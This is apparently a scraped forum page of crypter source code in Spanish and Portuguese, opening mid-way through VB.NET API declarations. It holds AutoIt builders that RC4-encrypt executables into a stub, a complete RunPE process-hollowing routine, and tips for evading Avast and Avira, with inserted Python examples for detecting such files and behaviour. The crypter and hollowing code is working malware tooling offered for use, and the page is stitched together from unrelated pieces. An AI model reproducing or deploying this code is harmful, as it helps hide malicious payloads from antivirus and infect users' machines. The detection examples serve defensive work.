SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[in]()> ByRef startup As SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, ByRef info As Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR) As Boolean Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVCal Jodsgfsfprocess As IntPtr, 
ByVal Jodhmjhxkhaddress As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, ByRef written As Integer) As Boolean Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, ByVal old As UInt32) As Integer Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32 Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean End Class End Class Bueno, llegamos a la conclusión del crypter
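For triage of files built this way, an added example (not part of the original post): the builder above writes `stub.exe`, a printable separator and the RC4 output into one file, so everything after the stub's last section is overlay data that starts with a text marker and is followed by high-entropy bytes. The function names, thresholds and the sample file below are assumptions constructed for illustration; only the `@_Jod_@` marker comes from the post.

```python
import hashlib
import math
import struct


def build_sample_pe(section_data=b"\x00" * 512):
    """Constructed, non-executable PE32 skeleton: headers plus one raw section."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    optional = struct.pack("<H", 0x10B) + bytes(222)          # PE32 magic, rest zeroed
    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                          len(section_data), 512, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + coff + optional + section
    return headers.ljust(512, b"\0") + section_data


def constructed_ciphertext(blocks=128):
    """Stand-in for an encrypted payload: 4096 deterministic, random-looking bytes."""
    return b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(blocks))


def end_of_sections(data):
    """File offset where the last section's raw data ends (start of any overlay)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    end = table + 40 * n_sections
    if end > len(data):
        raise ValueError("truncated section table")
    for i in range(n_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def shannon_entropy(buf):
    """Bits per byte; values close to 8 indicate encrypted or compressed data."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def leading_printable(buf, limit=64):
    """Printable ASCII run at the start of the overlay (the builder's separator)."""
    run = bytearray()
    for b in buf[:limit]:
        if not 0x20 <= b < 0x7F:
            break
        run.append(b)
    return bytes(run)


def inspect_overlay(data, min_size=256, entropy_threshold=7.0):
    # Caveat: an Authenticode signature also lives past the last section; a signed
    # file needs its certificate table excluded before this heuristic is applied.
    start = end_of_sections(data)
    overlay = data[start:]
    marker = leading_printable(overlay)
    body = overlay[len(marker):]
    entropy = round(shannon_entropy(body), 2)
    return {
        "overlay_offset": start,
        "overlay_size": len(overlay),
        "marker": marker.decode("ascii"),
        "entropy": entropy,
        "suspicious": len(body) >= min_size and entropy > entropy_threshold,
    }


if __name__ == "__main__":
    stub = build_sample_pe()
    print(inspect_overlay(stub))
    print(inspect_overlay(stub + b"@_Jod_@" + constructed_ciphertext()))
```

Installers and self-extracting archives also carry overlays, so treat a hit as a reason to look closer rather than as a verdict.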
  8. [es]Entendendo-Crypter-AU3-E-saltando-avs

    buenos amigos otra vez voy a publicar aquí una fuente de Crypter AU3 en equipo y la técnica de cómo obtener el AVS >#NoTrayIcon #include #include #include #include #include #include #Region ### START Koda GUI section ### Form= Opt("GuiOnEventMode",1) $a = GUICreate("", 610, 219, 192, 124) GUISetIcon("C:\Users\MineiirO\Desktop\A.D.I Icones\perso7.ico", -1) GUISetBkColor(0x000000) $Open = GUICtrlCreateButton("Open", 488, 64, 105, 41) $Cryptar = GUICtrlCreateButton("Cryptar", 488, 152, 113, 41) $Arquivo = GUICtrlCreateInput("Arquivo", 8, 72, 473, 21) $Label1 = GUICtrlCreateLabel(" IsNoT Crypter By MineiirO ", 72, 16, 316, 23) GUICtrlSetFont(-1, 12, 800, 2, "Swis721 BT") GUICtrlSetColor(-1, 0xFF0000) GUISetOnEvent($Gui_Event_Close, "sr") GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### GUICtrlSetOnEvent($Open, "Open") GUICtrlSetOnEvent($Cryptar, "Cs") Func Open() GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)")) EndFunc Func Cs() if GuiCtrlRead($Arquivo) = "" then return $stub = FileOpen(@ScriptDir & "\stub.exe" , 16) $arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16) $st = FileRead($stub) $ar = FileRead($arquivo2) $ar = _RC4($ar, "Key") $salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18) FileWrite($salvar, $st) FileWrite($salvar, StringToBinary("Wy4530")) FileWrite($salvar, $ar) FileClose($stub) FileClose($Arquivo) FileClose($Salvar) MsgBox(64, "Encriptado By MineiirO ! A.D.I FÊNIX! 
", "") EndFunc Func sr() Exit EndFunc While 1 Sleep(1) WEnd Stub > #NoTrayIcon #Include #include $file = FileOpen(@ScriptFullPath, 0) $Data = FileRead($file) $Data = StringMid($Data, StringInstr($Data, "Separador") + StringLen ("Separador")) $Data = _RC4($Data, "Key") _RunPE($Data) RC4 > Func _RC4($DATA, $key) Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000" Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]") DllStructSetData($CODEBUFFER, 1, $OPCODE) Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]") DllStructSetData($BUFFER, 1, $DATA) DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $key, "int", 0) Local $RET = DllStructGetData($BUFFER, 1) $BUFFER = 0 $CODEBUFFER = 0 Return $RET EndFunc RUMPE >Func _RunPE($Lgfaklwgfa2BBINARYIMAGE) Local $Lgfaklwgfa2BBINARY = Binary($Lgfaklwgfa2BBINARYIMAGE) Local $Lgfaklwgfa2TBINARY = DllStructCreate("byte[" & BinaryLen($Lgfaklwgfa2BBINARY) & "]") DllStructSetData($Lgfaklwgfa2TBINARY, 1, $Lgfaklwgfa2BBINARY) Local $Lgfaklwgfa2PPOINTER = DllStructGetPtr($Lgfaklwgfa2TBINARY) Local $Lgfaklwgfa2TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr 
hStdInput;" & "ptr hStdOutput;" & "ptr hStdError") Local $Lgfaklwgfa2TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId") Local $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($Lgfaklwgfa2TSTARTUPINFO), "ptr", DllStructGetPtr($Lgfaklwgfa2TPROCESS_INFORMATION)) Local $Lgfaklwgfa2HPROCESS = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Process") Local $Lgfaklwgfa2HTHREAD = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Thread") Local $Lgfaklwgfa2TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS") DllStructSetData($Lgfaklwgfa2TCONTEXT, "ContextFlags", 65538) $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT)) Local $Lgfaklwgfa2TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $Lgfaklwgfa2PPOINTER) $Lgfaklwgfa2PPOINTER += 
DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "AddressOfNewExeHeader") Local $Lgfaklwgfa2SMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "Magic") If Not ($Lgfaklwgfa2SMAGIC == "MZ") Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0) Return SetError(3, 0, 0) EndIf Local $Lgfaklwgfa2TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $Lgfaklwgfa2PPOINTER) $Lgfaklwgfa2PPOINTER += 4 If DllStructGetData($Lgfaklwgfa2TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0) Return SetError(4, 0, 0) EndIf Local $Lgfaklwgfa2TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $Lgfaklwgfa2PPOINTER) Local $Lgfaklwgfa2INUMBEROFSECTIONS = DllStructGetData($Lgfaklwgfa2TIMAGE_FILE_HEADER, "NumberOfSections") $Lgfaklwgfa2PPOINTER += 20 Local $Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $Lgfaklwgfa2PPOINTER) $Lgfaklwgfa2PPOINTER += 
96 Local $Lgfaklwgfa2IMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "Magic") If $Lgfaklwgfa2IMAGIC <> 267 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0) Return SetError(5, 0, 0) EndIf Local $Lgfaklwgfa2IENTRYPOINTNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") $Lgfaklwgfa2PPOINTER += 128 Local $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "ImageBase") Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfImage") $Lgfaklwgfa2ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW) $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64) Local $Lgfaklwgfa2PREMOTECODE = $Lgfaklwgfa2ACALL[0] Local $Lgfaklwgfa2PHEADERS_NEW = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER) Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE, "ptr", $Lgfaklwgfa2PHEADERS_NEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0) Local $Lgfaklwgfa2TIMAGE_SECTION_HEADER Local $Lgfaklwgfa2ISIZEOFRAWDATA, $Lgfaklwgfa2PPOINTERTORAWDATA Local $Lgfaklwgfa2IVIRTUALADDRESS For $Lgfaklwgfa2I = 1 To $Lgfaklwgfa2INUMBEROFSECTIONS $Lgfaklwgfa2TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort 
NumberOfLinenumbers;" & "dword Characteristics", $Lgfaklwgfa2PPOINTER) $Lgfaklwgfa2ISIZEOFRAWDATA = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "SizeOfRawData") $Lgfaklwgfa2PPOINTERTORAWDATA = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER) + DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "PointerToRawData") $Lgfaklwgfa2IVIRTUALADDRESS = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "VirtualAddress") If $Lgfaklwgfa2ISIZEOFRAWDATA Then $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IVIRTUALADDRESS, "ptr", $Lgfaklwgfa2PPOINTERTORAWDATA, "dword", $Lgfaklwgfa2ISIZEOFRAWDATA, "dword*", 0) EndIf $Lgfaklwgfa2PPOINTER += 40 Next DllStructSetData($Lgfaklwgfa2TCONTEXT, "Eax", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IENTRYPOINTNEW) $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT)) $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $Lgfaklwgfa2HTHREAD) EndFunc Los buenos amigos son algunas maneras de final ir simple de la AVS: Zoner-- Código: Seleccionar todo ShellExecuteWait(@Scriptdir & "\upx.exe", '-d stub.exe', @scripdir &'\','open',@SW_HIDE) Para eliminar avast y avira asiento con la cabeza RC4 cifrar y RunPE Una vez que quede claro que este post es de mi total de Altor
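From the detection side, an added example (not part of the original post): both stubs on this page create a child process suspended (creation flag 4), unmap its image, allocate and write new memory, set the thread context and resume it, and that ordered sequence against one child is what behavioural monitoring can key on. The trace format, field names, process IDs and paths are constructed assumptions; real telemetry (EDR, ETW, sandbox API logs) has its own schema.

```python
import re

# Ordered calls the parent makes against the child it created suspended.
STEPS = ("NtUnmapViewOfSection", "VirtualAllocEx", "WriteProcessMemory",
         "SetThreadContext", "ResumeThread")
ALIASES = {"ZwUnmapViewOfSection": "NtUnmapViewOfSection",
           "CreateProcessW": "CreateProcess", "CreateProcessA": "CreateProcess"}
CREATE_SUSPENDED = 0x4
PAGE_EXECUTE_READWRITE = 0x40

EVENT = re.compile(r"^(\S+) pid=(\d+) api=(\w+)\s*(.*)$")

# Constructed sample trace: one hollowing sequence, one ordinary suspended launch,
# and one unrelated cross-process write.
TRACE = [
    "10:00:01.100 pid=4120 api=CreateProcessW target=4388 flags=0x4 image=C:\\Users\\lab\\sample.exe",
    "10:00:01.105 pid=4120 api=GetThreadContext target=4388",
    "10:00:01.110 pid=4120 api=NtUnmapViewOfSection target=4388 base=0x400000",
    "10:00:01.112 pid=4120 api=VirtualAllocEx target=4388 base=0x400000 type=0x3000 protect=0x40",
    "10:00:01.115 pid=4120 api=WriteProcessMemory target=4388 size=1024",
    "10:00:01.116 pid=4120 api=WriteProcessMemory target=4388 size=16896",
    "10:00:01.118 pid=4120 api=SetThreadContext target=4388",
    "10:00:01.120 pid=4120 api=ResumeThread target=4388",
    "10:00:05.000 pid=900 api=CreateProcessW target=5012 flags=0x4 image=C:\\Tools\\updater.exe",
    "10:00:05.010 pid=900 api=ResumeThread target=5012",
    "10:00:07.000 pid=2200 api=WriteProcessMemory target=2300 size=8",
]


def parse(line):
    """Turn one trace line into a dict, or None if it does not match the format."""
    m = EVENT.match(line.strip())
    if not m:
        return None
    ts, pid, api, rest = m.groups()
    fields = dict(kv.split("=", 1) for kv in rest.split() if "=" in kv)
    return {"ts": ts, "pid": int(pid), "api": ALIASES.get(api, api), **fields}


def find_hollowing(lines):
    """Return one alert per child that received the full ordered sequence."""
    tracked = {}  # child pid -> progress through STEPS
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev is None or "target" not in ev:
            continue
        child = int(ev["target"])
        if ev["api"] == "CreateProcess":
            if int(ev.get("flags", "0"), 0) & CREATE_SUSPENDED:
                tracked[child] = {"parent": ev["pid"], "step": 0, "rwx": False,
                                  "image": ev.get("image", ""), "start": ev["ts"]}
            continue
        state = tracked.get(child)
        if state is None or state["parent"] != ev["pid"]:
            continue  # only calls made by the creating process count
        if ev["api"] == STEPS[state["step"]]:
            if ev["api"] == "VirtualAllocEx":
                state["rwx"] = bool(int(ev.get("protect", "0"), 0) & PAGE_EXECUTE_READWRITE)
            state["step"] += 1
        elif (ev["api"] == "WriteProcessMemory" and state["step"] > 0
              and STEPS[state["step"] - 1] == "WriteProcessMemory"):
            continue  # one write per section, plus the image-base patch
        elif ev["api"] == "ResumeThread":
            del tracked[child]  # resumed without the sequence: ordinary launch
            continue
        if state["step"] == len(STEPS):
            alerts.append({"parent": state["parent"], "child": child, "image": state["image"],
                           "rwx": state["rwx"], "start": state["start"], "end": ev["ts"]})
            del tracked[child]
    return alerts


if __name__ == "__main__":
    for alert in find_hollowing(TRACE):
        print(alert)
```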
  9. Cliente Gui Clasy Queda

    >#Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_icon=123.ico #AutoIt3Wrapper_UseUpx=n #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include #include #include #include #include #include #include #Region ### START Koda GUI section ### Form= $MainGui = _MakeGUI(@ScriptDir&"\bg.png", "Classic crypter", 1, 200) $Input1 = GUICtrlCreateInput("", 370, 140, 200, 21) $Button1 = GUICtrlCreateButton("Abrir", 575, 140, 65, 24) $Button2 = GUICtrlCreateButton("Cryptar", 640, 140, 65, 25, $WS_GROUP) $Button3 = GUICtrlCreateButton("About", 705, 140, 65, 25, $WS_GROUP) $Checkbox2 = GUICtrlCreateCheckbox("", 705, 100, 12, 12) #EndRegion ### END Koda GUI section ### GUICtrlSetOnEvent($Button1,"abrir") GuiCtrlSetOnevent($Button2, "Encryptar") FileInstall("bg.png" ,@ScriptDir&"\bg.png") ; Copia a imagen da forma principal para o local determinado Func Abrir() GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*)")) If GUICtrlRead($Input1) = "" Then Return ;Retorna o estado anterior da Imput se o arquivo não for selecionado EndFunc Func Encryptar() WinSetOnTop($MainGui, "", 0) If GuiCtrlRead($Input1) = "" Then Return ; Condição que retorna se a Input1 não estiver preenchida $Stub = FileOpen(@ScriptDir&"\Stub.exe", 16) $File = FileOpen(GuiCtrlRead($Input1), 16) $s = FileRead($Stub) $f = FileRead($File) $f = _RC4($f, "MASDoAMOSdoAMODmoiAMOISDmoiAIOSDioAIOIOSxASKOxKOAKSFADAWdOIAWfoajeofjAJEjJUAFjAJOEjoA") $save = FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe" $abri = FileOpen($save, 18) FileWrite($abri, $s) FileWrite($abri, StringToBinary("ASJdAEjfAJfjASOdAOIDmioAMIOSDoAEMOmoFAOMEOiFJIAJSdjoiRvBAIOSDjioAJIOdeAEJIOdjioAdejOAdeJIAEd")) FileWrite($abri, $f) FileClose($Stub) Fileclose($File) Fileclose($abri) Fileclose($abri) FileClose($Input1) MsgBox(64, "", "Encryptado com sucesso") EndFunc While 1 Sleep(1) WEnd